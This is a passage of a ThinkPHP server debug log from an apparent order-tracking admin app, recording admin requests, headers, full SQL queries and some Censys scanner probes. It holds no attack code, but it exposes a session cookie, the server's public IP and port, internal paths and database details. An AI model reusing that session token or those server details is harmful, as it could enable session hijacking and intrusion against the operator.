`aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000482s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.000578s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,358,359,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001175s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.000698s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000328s ] [ sql ] [ SQL ] SELECT `title`,`remark` FROM `ot_auth_rule` WHERE `name` = 'financial/verifybill' LIMIT 1 [ RunTime:0.000312s ] --------------------------------------------------------------- [ 2025-12-14T16:46:09+08:00 ] 106.112.204.117 GET /admin/ajax/lang?callback=define&controllername=financial.verifybill&v=1765701968 [ info ] 47.105.33.115:8081/admin/ajax/lang?callback=define&controllername=financial.verifybill&v=1765701968 [运行时间:0.032386s][吞吐率:30.88req/s] [内存消耗:3,849.77kb] [文件加载:71] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000040s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001180s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'ajax', 2 => 'lang', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => '*/*', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'referer' => 'http://47.105.33.115:8081/admin/financial/verifybill?addtabs=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=24urn8pmghle20960cno2tm5g2', ) [ info ] [ PARAM ] array ( 'callback' => 'define', 'controllername' => 'financial.verifybill', 'v' => '1765701968', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001570s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/ajax.php [ info ] [ RUN ] app\admin\controller\Ajax->lang[ /alidata/www/gendan/application/admin/controller/Ajax.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000108s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T16:46:10+08:00 ] 106.112.204.117 GET /admin/financial/verifybill/index?sort=id&order=desc&offset=0&limit=10&filter=%7B%22start_time%22%3A%222025-11-14+00%3A00%3A00%22%2C%22end_time%22%3A%222025-12-14+23%3A59%3A59%22%7D&op=%7B%22start_time%22%3A%22%3D%22%2C%22end_time%22%3A%22%3D%22%7D&_=1765701970983 [ info ] 47.105.33.115:8081/admin/financial/verifybill/index?sort=id&order=desc&offset=0&limit=10&filter=%7B%22start_time%22%3A%222025-11-14+00%3A00%3A00%22%2C%22end_time%22%3A%222025-12-14+23%3A59%3A59%22%7D&op=%7B%22start_time%22%3A%22%3D%22%2C%22end_time%22%3A%22%3D%22%7D&_=1765701970983 [运行时间:0.253891s][吞吐率:3.94req/s] [内存消耗:5,707.38kb] [文件加载:88] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000040s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001090s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.verifybill', 2 => 'index', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/json', 'referer' => 'http://47.105.33.115:8081/admin/financial/verifybill?addtabs=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=24urn8pmghle20960cno2tm5g2', ) [ info ] [ PARAM ] array ( 'sort' => 'id', 'order' => 'desc', 'offset' => '0', 'limit' => '10', 'filter' => '{"start_time":"2025-11-14 00:00:00","end_time":"2025-12-14 23:59:59"}', 'op' => '{"start_time":"=","end_time":"="}', '_' => '1765701970983', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001481s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\financial\Verifybill->index[ /alidata/www/gendan/application/admin/controller/financial/Verifybill.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000114s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000386s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.000683s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000569s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.000997s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,358,359,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001133s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.000907s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000313s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outbound` [ RunTime:0.000569s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_kehu` [ RunTime:0.000562s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outboundandorder` [ RunTime:0.000576s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM ( SELECT `outbound`.`id`,`outbound`.`number`,`outbound`.`kehu_id`,`outbound`.`total_money`,`outbound`.`buildstaff_id`,`outbound`.`staffinfo_id`,`outbound`.`factorymge_id`,`outbound`.`complete_status`,`outbound`.`admin_id`,`outbound`.`is_print`,`outbound`.`createtime`,`outbound`.`updatetime`,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,kehu.id AS kehu__id,kehu.name AS kehu__name,kehu.phone1 AS kehu__phone1,kehu.phone2 AS kehu__phone2,kehu.qq AS kehu__qq,kehu.email AS kehu__email,kehu.receiving_address AS kehu__receiving_address,kehu.normalstatus AS kehu__normalstatus,kehu.factorymge_id AS kehu__factorymge_id,kehu.source_fac_id AS kehu__source_fac_id,kehu.admin_id AS kehu__admin_id,kehu.createtime AS kehu__createtime,kehu.updatetime AS kehu__updatetime,outboundandorder.id AS outboundandorder__id,outboundandorder.outbound_id AS outboundandorder__outbound_id,outboundandorder.orderinfo_id AS outboundandorder__orderinfo_id,outboundandorder.kehu_id AS outboundandorder__kehu_id,outboundandorder.amount AS outboundandorder__amount,outboundandorder.money AS outboundandorder__money,outboundandorder.price AS outboundandorder__price,outboundandorder.productinfo_id AS outboundandorder__productinfo_id,outboundandorder.factorymge_id AS outboundandorder__factorymge_id,outboundandorder.staffinfo_id AS outboundandorder__staffinfo_id,outboundandorder.admin_id AS outboundandorder__admin_id,outboundandorder.createtime AS outboundandorder__createtime,outboundandorder.updatetime AS outboundandorder__updatetime,outboundandorder.verify_status AS outboundandorder__verify_status,outboundandorder.verify_amount AS outboundandorder__verify_amount,count(*) FROM `ot_outbound` `outbound` LEFT JOIN `ot_factorymge` `factorymge` ON `outbound`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_kehu` `kehu` ON `outbound`.`kehu_id`=`kehu`.`id` LEFT JOIN `ot_outboundandorder` `outboundandorder` ON `outbound`.`id`=`outboundandorder`.`outbound_id` WHERE ( outbound.createtime > 1763049600 ) AND ( outbound.createtime <= 1765727999 ) AND `outboundandorder`.`verify_status` = 0 AND `outbound`.`factorymge_id` = '40' GROUP BY `outbound`.`id` ORDER BY `outbound`.`id` DESC ) `_group_count_` LIMIT 1 [ RunTime:0.021953s ] [ sql ] [ SQL ] SELECT `outbound`.`id`,`outbound`.`number`,`outbound`.`kehu_id`,`outbound`.`total_money`,`outbound`.`buildstaff_id`,`outbound`.`staffinfo_id`,`outbound`.`factorymge_id`,`outbound`.`complete_status`,`outbound`.`admin_id`,`outbound`.`is_print`,`outbound`.`createtime`,`outbound`.`updatetime`,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,kehu.id AS kehu__id,kehu.name AS kehu__name,kehu.phone1 AS kehu__phone1,kehu.phone2 AS kehu__phone2,kehu.qq AS kehu__qq,kehu.email AS kehu__email,kehu.receiving_address AS kehu__receiving_address,kehu.normalstatus AS kehu__normalstatus,kehu.factorymge_id AS kehu__factorymge_id,kehu.source_fac_id AS kehu__source_fac_id,kehu.admin_id AS kehu__admin_id,kehu.createtime AS kehu__createtime,kehu.updatetime AS kehu__updatetime,outboundandorder.id AS outboundandorder__id,outboundandorder.outbound_id AS outboundandorder__outbound_id,outboundandorder.orderinfo_id AS outboundandorder__orderinfo_id,outboundandorder.kehu_id AS outboundandorder__kehu_id,outboundandorder.amount AS outboundandorder__amount,outboundandorder.money AS outboundandorder__money,outboundandorder.price AS outboundandorder__price,outboundandorder.productinfo_id AS outboundandorder__productinfo_id,outboundandorder.factorymge_id AS outboundandorder__factorymge_id,outboundandorder.staffinfo_id AS outboundandorder__staffinfo_id,outboundandorder.admin_id AS outboundandorder__admin_id,outboundandorder.createtime AS outboundandorder__createtime,outboundandorder.updatetime AS outboundandorder__updatetime,outboundandorder.verify_status AS outboundandorder__verify_status,outboundandorder.verify_amount AS outboundandorder__verify_amount FROM `ot_outbound` `outbound` LEFT JOIN `ot_factorymge` `factorymge` ON `outbound`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_kehu` `kehu` ON `outbound`.`kehu_id`=`kehu`.`id` LEFT JOIN `ot_outboundandorder` `outboundandorder` ON `outbound`.`id`=`outboundandorder`.`outbound_id` WHERE `outboundandorder`.`verify_status` = 0 AND ( outbound.createtime > 1763049600 ) AND ( outbound.createtime <= 1765727999 ) AND `outbound`.`factorymge_id` = '40' GROUP BY `outbound`.`id` ORDER BY `outbound`.`id` DESC LIMIT 0,10 [ RunTime:0.022371s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11831 [ RunTime:0.014466s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11830 [ RunTime:0.014052s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11829 [ RunTime:0.014059s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11828 [ RunTime:0.013777s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11827 [ RunTime:0.014484s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11826 [ RunTime:0.014549s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11825 [ RunTime:0.014508s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11824 [ RunTime:0.014334s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11823 [ RunTime:0.013865s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11822 [ RunTime:0.014586s ] --------------------------------------------------------------- [ 2025-12-14T16:47:12+08:00 ] 167.94.138.44 GET / [ info ] 47.105.33.115/ [运行时间:0.031585s][吞吐率:31.66req/s] [内存消耗:3,333.13kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000053s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001138s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115', 'user-agent' => 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'accept' => '*/*', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001568s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000098s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T16:47:31+08:00 ] 167.94.138.44 GET /favicon.ico [ info ] 47.105.33.115/favicon.ico [运行时间:0.021521s][吞吐率:46.47req/s] [内存消耗:2,226.05kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000042s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001157s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'favicon.ico', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115', 'user-agent' => 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'accept-encoding' => 'gzip', 'connection' => 'close', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T16:47:52+08:00 ] 167.94.138.44 GET /login [ info ] 47.105.33.115/login [运行时间:0.018790s][吞吐率:53.22req/s] [内存消耗:2,225.87kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000036s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001107s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'login', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115', 'user-agent' => 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'accept' => '*/*', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T16:47:56+08:00 ] 167.94.138.191 GET /favicon.ico [ info ] 47.105.33.115/favicon.ico [运行时间:0.021401s][吞吐率:46.73req/s] [内存消耗:2,228.37kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000040s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001282s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'favicon.ico', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115', 'user-agent' => 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'accept-encoding' => 'gzip', 'connection' => 'close', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T16:48:00+08:00 ] 106.112.204.117 GET /admin/financial/verifybill/hedui/ids/11831?dialog=1 [ info ] 47.105.33.115:8081/admin/financial/verifybill/hedui/ids/11831?dialog=1 [运行时间:0.079889s][吞吐率:12.52req/s] [内存消耗:6,274.70kb] [文件加载:89] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000037s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001162s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.verifybill', 2 => 'hedui', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'upgrade-insecure-requests' => '1', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'referer' => 'http://47.105.33.115:8081/admin/financial/verifybill?addtabs=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=24urn8pmghle20960cno2tm5g2', ) [ info ] [ PARAM ] array ( 'dialog' => '1', 'ids' => '11831', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001554s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\financial\Verifybill->hedui[ /alidata/www/gendan/application/admin/controller/financial/Verifybill.php ] [ info ] [ VIEW ] /alidata/www/gendan/public/../application/admin/view/financial/verifybill/hedui.html [ array ( 0 => 'breadcrumb', 1 => 'site', 2 => 'config', 3 => 'auth', 4 => 'admin', 5 => 'adminid', 6 => 'faccount', 7 => 'shoukuanStatusList', 8 => 'start_time', 9 => 'end_time', 10 => 'total', 11 => 'outbound', 12 => 'rows', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000101s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000377s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.000701s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000389s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.000702s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,358,359,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.000978s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.000707s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000272s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outboundandorder` [ RunTime:0.000730s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.000903s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.000714s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_kehu` [ RunTime:0.000704s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outbound` [ RunTime:0.000779s ] [ sql ] [ SQL ] SELECT `outboundandorder`.`id`,`outboundandorder`.`outbound_id`,`outboundandorder`.`orderinfo_id`,`outboundandorder`.`kehu_id`,`outboundandorder`.`amount`,`outboundandorder`.`money`,`outboundandorder`.`price`,`outboundandorder`.`productinfo_id`,`outboundandorder`.`factorymge_id`,`outboundandorder`.`staffinfo_id`,`outboundandorder`.`admin_id`,`outboundandorder`.`createtime`,`outboundandorder`.`updatetime`,`outboundandorder`.`verify_status`,`outboundandorder`.`verify_amount`,orderinfo.id AS orderinfo__id,orderinfo.nei_number AS orderinfo__nei_number,orderinfo.number AS orderinfo__number,orderinfo.pid AS orderinfo__pid,orderinfo.order_company AS orderinfo__order_company,orderinfo.order_connect AS orderinfo__order_connect,orderinfo.order_phone AS orderinfo__order_phone,orderinfo.kehu_id AS orderinfo__kehu_id,orderinfo.price AS orderinfo__price,orderinfo.material_id AS orderinfo__material_id,orderinfo.pProductinfo_id AS orderinfo__pProductinfo_id,orderinfo.productinfo_id AS orderinfo__productinfo_id,orderinfo.order_type AS orderinfo__order_type,orderinfo.order_status AS orderinfo__order_status,orderinfo.all_order_status AS orderinfo__all_order_status,orderinfo.shengchan_status AS orderinfo__shengchan_status,orderinfo.zuixinshuoming AS orderinfo__zuixinshuoming,orderinfo.guzhangshu AS orderinfo__guzhangshu,orderinfo.zuixinguzhang AS orderinfo__zuixinguzhang,orderinfo.techprocess_id AS orderinfo__techprocess_id,orderinfo.actual_amount AS orderinfo__actual_amount,orderinfo.kucun_amount AS orderinfo__kucun_amount,orderinfo.produce_amount AS orderinfo__produce_amount,orderinfo.produced_amount AS orderinfo__produced_amount,orderinfo.waste_amount AS orderinfo__waste_amount,orderinfo.produced_time AS orderinfo__produced_time,orderinfo.send_amount AS orderinfo__send_amount,orderinfo.ruku_posi AS orderinfo__ruku_posi,orderinfo.sent_amount AS orderinfo__sent_amount,orderinfo.out_time AS orderinfo__out_time,orderinfo.build_order_staffid AS orderinfo__build_order_staffid,orderinfo.factorymge_id AS orderinfo__factorymge_id,orderinfo.admin_id AS orderinfo__admin_id,orderinfo.remind_day AS orderinfo__remind_day,orderinfo.build_time AS orderinfo__build_time,orderinfo.end_time AS orderinfo__end_time,orderinfo.responsible_staffinfos AS orderinfo__responsible_staffinfos,orderinfo.responsible_staffinfovars AS orderinfo__responsible_staffinfovars,orderinfo.feedback AS orderinfo__feedback,orderinfo.guoqitime AS orderinfo__guoqitime,orderinfo.guoqi_status AS orderinfo__guoqi_status,orderinfo.put_position AS orderinfo__put_position,orderinfo.createtime AS orderinfo__createtime,orderinfo.updatetime AS orderinfo__updatetime,orderinfo.is_modify AS orderinfo__is_modify,orderinfo.purchaseorder_id AS orderinfo__purchaseorder_id,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime,kehu.id AS kehu__id,kehu.name AS kehu__name,kehu.phone1 AS kehu__phone1,kehu.phone2 AS kehu__phone2,kehu.qq AS kehu__qq,kehu.email AS kehu__email,kehu.receiving_address AS kehu__receiving_address,kehu.normalstatus AS kehu__normalstatus,kehu.factorymge_id AS kehu__factorymge_id,kehu.source_fac_id AS kehu__source_fac_id,kehu.admin_id AS kehu__admin_id,kehu.createtime AS kehu__createtime,kehu.updatetime AS kehu__updatetime,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,outbound.id AS outbound__id,outbound.number AS outbound__number,outbound.kehu_id AS outbound__kehu_id,outbound.total_money AS outbound__total_money,outbound.buildstaff_id AS outbound__buildstaff_id,outbound.staffinfo_id AS outbound__staffinfo_id,outbound.factorymge_id AS outbound__factorymge_id,outbound.complete_status AS outbound__complete_status,outbound.admin_id AS outbound__admin_id,outbound.is_print AS outbound__is_print,outbound.createtime AS outbound__createtime,outbound.updatetime AS outbound__updatetime FROM `ot_outboundandorder` `outboundandorder` LEFT JOIN `ot_orderinfo` `orderinfo` ON `outboundandorder`.`orderinfo_id`=`orderinfo`.`id` LEFT JOIN `ot_productinfo` `productinfo` ON `outboundandorder`.`productinfo_id`=`productinfo`.`id` LEFT JOIN `ot_kehu` `kehu` ON `outboundandorder`.`kehu_id`=`kehu`.`id` LEFT JOIN `ot_factorymge` `factorymge` ON `outboundandorder`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_outbound` `outbound` ON `outboundandorder`.`outbound_id`=`outbound`.`id` WHERE `outbound`.`id` = '11831' [ RunTime:0.014794s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE `id` = 1021 LIMIT 1 [ RunTime:0.000326s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE `id` = 1120 LIMIT 1 [ RunTime:0.000226s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE `id` = 1123 LIMIT 1 [ RunTime:0.000213s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE `id` = 1059 LIMIT 1 [ RunTime:0.000225s ] [ sql ] [ SQL ] SELECT * FROM `ot_outbound` WHERE `id` = 11831 LIMIT 1 [ RunTime:0.000234s ] --------------------------------------------------------------- [ 2025-12-14T16:48:01+08:00 ] 106.112.204.117 GET /admin/ajax/lang?callback=define&controllername=financial.verifybill&v=1765702080 [ info ] 47.105.33.115:8081/admin/ajax/lang?callback=define&controllername=financial.verifybill&v=1765702080 [运行时间:0.031283s][吞吐率:31.97req/s] [内存消耗:3,850.14kb] [文件加载:71] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000036s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001153s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'ajax', 2 => 'lang', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 